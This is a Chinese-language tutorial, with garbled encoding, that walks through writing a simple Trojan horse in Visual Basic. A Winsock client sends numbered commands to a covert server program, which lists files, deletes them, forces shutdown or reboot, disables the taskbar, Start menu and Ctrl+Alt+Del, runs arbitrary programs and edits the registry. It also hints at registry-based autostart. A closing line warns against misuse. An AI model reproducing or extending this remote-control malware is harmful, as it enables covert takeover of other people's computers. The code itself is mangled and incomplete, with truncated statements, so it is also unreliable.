?bo又稱“特洛伊木馬”，是在美國一次黑客技術(shù)討論會上由一個黑客組織推出的。它其實是一種客戶機/服務(wù)器程序，其利用的原理就是：在本機直接啟動運行的程序擁有與使用者相同的權(quán)限。因此如果能夠啟動服務(wù)器端（即被攻擊的計算機）的服務(wù)器程序，就可以使用相應(yīng)的客戶端工具客戶程序直接控制它了。下面來談?wù)勅绾斡胿b來實現(xiàn)它。

    ----使用vb建立兩個程序，一個為客戶端程序t，一個為服務(wù)器端程序systry。

    ----在t工程中建立一個窗體，加載insock控件，稱為tcpt，協(xié)議選擇tcp，再加入兩個文本框，用以輸入服務(wù)器的ip地址或服務(wù)器名，然后建立一個按鈕，按下之后就可以對連接進行初始化了，代碼如下：

    privatesubcmdect_click

    len()=0andlen()=0then

    msgbox(“請輸入主機名或主機ip地址。“)

    exitsub

    else

    len()>0the=

    els=

    end

    endi

    =true

    endsub

    ----連接建立之后就可以使用dataarrival事件處理所收到的數(shù)據(jù)了。

    ----在服務(wù)器端systry工程也建立一個窗體，加載insock控件，稱為tcpserver，協(xié)議選擇tcp，在form_load事件中加入如下代碼：

    privatesubform_loa=199

    endsub

    ----準(zhǔn)備應(yīng)答客戶端程序的請求連接，使用erequest事件來應(yīng)答戶端程序的請求，代碼如下：

    privatesubtcpserver_erequest

    (byvalrequestidlong)

    sckclosedthe‘檢查控件的state屬性是否為關(guān)閉的。

    end如果不是，在接受新的連接之前先關(guān)閉此連接。

    requestid

    endsub

    ----這樣在客戶端程序按下了連接按鈕后，服務(wù)器端程序的erequest事件被觸發(fā)，執(zhí)行了以上的代碼。如果不出意外，連接就被建立起來了。

    ----建立連接后服務(wù)器端的程序通過dataarrival事件接收客戶機端程序所發(fā)的指令運行既定的程序。如：把服務(wù)器端的驅(qū)動器名、目錄名、文件名等傳到客戶機端，客戶機端接收后用treevie控件以樹狀的形式顯示出來，瀏覽服務(wù)器端文件目錄；強制關(guān)閉或重啟服務(wù)器端的計算機；屏蔽任務(wù)欄窗口；屏蔽開始菜單；按照客戶機端傳過來的文件名或目錄名，而刪除它；屏蔽熱啟動鍵；運行服務(wù)器端的任何程序；還包括獲取目標(biāo)計算機屏幕圖象、窗口及進程列表；激活、終止遠(yuǎn)端進程；打開、關(guān)閉、移動遠(yuǎn)端窗口；控制目標(biāo)計算機鼠標(biāo)的移動與動作；交換遠(yuǎn)端鼠標(biāo)的左右鍵；在目標(biāo)計算機模擬鍵盤輸入，下載、上裝文件；提取、創(chuàng)建、修改目標(biāo)計算機系統(tǒng)注冊表關(guān)鍵字；在遠(yuǎn)端屏幕上顯示消息。dataarrival事件程序如下：

    privatesubtcpserver_dataarrival

    (byvalbytestotallong)

    dimstrdatastring

    dimilong

    dimmkeystrinstrdata

    ‘接收數(shù)據(jù)并存入strdata

    fori=1len(strdata)

    ‘分離strdata中的命令

    mid(strdata,i,1)=““then

    mkey=left(strdata,i-1)

    ‘把命令id號存入mkey

    ‘把命令參數(shù)存入strdata

    strdata=right(strdata,len(strdata)-i)

    exitfor

    end

    i

    selectcaseval(mkey)

    case1

    ‘驅(qū)動器名、目錄名、文件名

    case2

    強制關(guān)閉服務(wù)器端的計算機

    case3

    強制重啟服務(wù)器端的計算機

    case4

    屏蔽任務(wù)欄窗口；

    case5

    屏蔽開始菜單；

    case6

    按照客戶機端傳過來的文件名或目錄名，而刪除它；

    case7

    屏蔽熱啟動鍵；

    case8

    運行服務(wù)器端的任何程序

    e

    endsub

    詳細(xì)程序略。

    ----客戶機端用發(fā)命令。命令包括命令id和命令參數(shù)，它們用符號“”隔開。

    ----另外，當(dāng)客戶機端斷開與服務(wù)器端的來接后，服務(wù)器端應(yīng)用tcpserver_close事件，來繼續(xù)準(zhǔn)備接收客戶機端的請求，其代碼如下：

    privatesubtcpserver_clos

    endsub

    ----這就是一個最基本的特洛伊木馬程序，只要你的機器運行了服務(wù)器端程序，那別人就可以在千里之外控制你的計算機。至于如何讓服務(wù)器端程序運行就要發(fā)揮你的聰明才智了，在我的源程序中有一中方法，是修改系統(tǒng)注冊表的方法。

    ----成功的特洛伊木馬程序要比這個復(fù)雜一些，還有程序的隱藏、自動復(fù)制、傳播等問題要解決。警告：千萬不要用bo程序破壞別人的系統(tǒng)。